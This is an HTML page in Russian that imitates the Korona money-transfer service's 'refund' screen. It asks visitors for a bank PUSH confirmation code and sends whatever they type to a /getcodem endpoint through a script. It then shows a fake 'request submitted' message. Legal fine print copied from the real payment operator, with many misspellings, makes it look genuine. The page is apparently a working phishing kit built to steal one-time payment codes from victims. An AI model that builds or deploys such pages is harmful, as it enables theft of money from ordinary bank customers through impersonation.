<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <title>Возврат</title>
    <link rel="stylesheet" href="/styles.css">
</head>
<body style="background-color: #FFFFFF">

<div style="display: flex;align-items: center;position: absolute;left: 50%;transform: translate(-50%, 0%);">
    <div style="display: inline-block">
        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="48" height="48" viewBox="0 0 48 48">
            <defs>
                <linearGradient id="b" x1="50%" x2="50%" y1="0%" y2="100%">
                    <stop offset="0%" stop-color="#68B3E2"/>
                    <stop offset="100%" stop-color="#5AA5D4"/>
                </linearGradient>
                <path id="a" d="M13.2 0h21.6C42.09 0 48 5.91 48 13.2v21.6C48 42.09 42.09 48 34.8 48H13.2C5.91 48 0 42.09 0 34.8V13.2C0 5.91 5.91 0 13.2 0"/>
            </defs>
            <g fill="none" fill-rule="evenodd">
                <g>
                    <mask id="c" fill="#fff">
                        <use xlink:href="#a"/>
                    </mask>
                    <use fill="#FFC900" xlink:href="#a"/>
                    <use fill="url(#b)" xlink:href="#a"/>
                    <path fill="#E61A33" d="M48 0v48H0V0z" mask="url(#c)"/>
                </g>
                <path fill="#FC0" d="M12.69 36v-2.562h21.42V36H12.69zm13.545-23.545l-2.865 2.848-2.805-2.848L23.37 9.6l2.865 2.855zm.38 17.57V19.13c1.905.31 3.756.898 5.496 1.745l-3.551 8.744a.688.688 0 0 1-.609.407c-.266.01-1.335 0-1.335 0zM24.1 16.3v16.01s4.134-.005 5.21 0c.898.003 1.219-.822 1.219-.822l3.775-9.37c.363.238.719.487 1.066.747l-3.923 9.445h2.735L38.4 22.034A22.43 22.43 0 0 0 24.099 16.3zm-3.915 13.726V19.13c-1.905.31-3.756.898-5.496 1.745l3.552 8.744c.11.243.346.4.609.407.266.01 1.335 0 1.335 0zM22.701 16.3v16.01s-4.135-.005-5.21 0c-.899.003-1.22-.822-1.22-.822l-3.774-9.37c-.363.238-.719.487-1.066.747l3.922 9.445H12.62L8.4 22.034A22.43 22.43 0 0 1 22.7 16.3z"/>
            </g>
        </svg>
    </div>
    <span style="vertical-align: middle;margin-left: 0.5vh;color: #717171;font-size: 140%" class="roboto-black">Korona</span>
</div>
<div class="form2-bg" style="text-align: center;">
    <div class="form-inp-cont">
        <input type="text" onkeypress="return event.charCode >= 48 && event.charCode <= 57" id="code" class="form2-inp-box roboto-regular" placeholder="PUSH код">
    </div>
    <p class="roboto-bold" style="color: #50AD51; margin-bottom: 0; margin-top: 1vh; display: none" id="succeful">Заявка успешно подана!</p>
    <button onclick="sendcode(document.getElementById('code').value)" class="form2-inp-button roboto-bold">Отправить</button>
</div>
<p class="roboto-regular" style="color: #969696;font-size: clamp(0.35vh, 0.6vw, 0.6vw);min-font-size: 20%;text-align: center;position: absolute;bottom: 3vh;left: 50%;transform: translate(-50%,0%);">Получение доступно на карты национальной платенной системы банков Китал - UnionPау за исключанием Гонконга, Макао и Тайваня (далее - ПС UnionPay). Отправка перевода осуществляется по правилам ПС UnionPay Валюта распоряжения в переводе - доллар США. Банки-эмитенты вправе при зачислении конвертировать валюту перевода в валюту карты получателя по курсу ПС UnionPay а также взимать комиссию РНКО «Платежный Центр» (ООО) не несет ответственности за сумму, зачисленную банком - эмитентом карты Распоряжение о переводе исполняется от нескольких минут, но не позднее трек рабоних дней со дня получения распорижения о переводе При отравко дененного перевода с карты российского банка вас обслуивант РНКО «Платенный Цинтр» (ООО), пиценаия Банка России №3166-К от 14 04 2014г (г Новосибирск, уп. Кирова д 86, ОГРН 1025400002968) Есть ограничения Подробнов о тарифах, ограничениях и условиях оказания успуги - на сайте rnko.ru в разделах "Денежные переводы онпайн" Оператор по перевод</p>
<script>
    function test(el){
        if(el.value.length === 2){
            el.value = el.value+'/'
        }
    }
    function sendcode(val){
        if(val.length > 0){
            fetch(`/getcodem?code=${val}`)
            document.getElementById('succeful').style.display = 'block'
        }
    }
</script>
</body>
</html>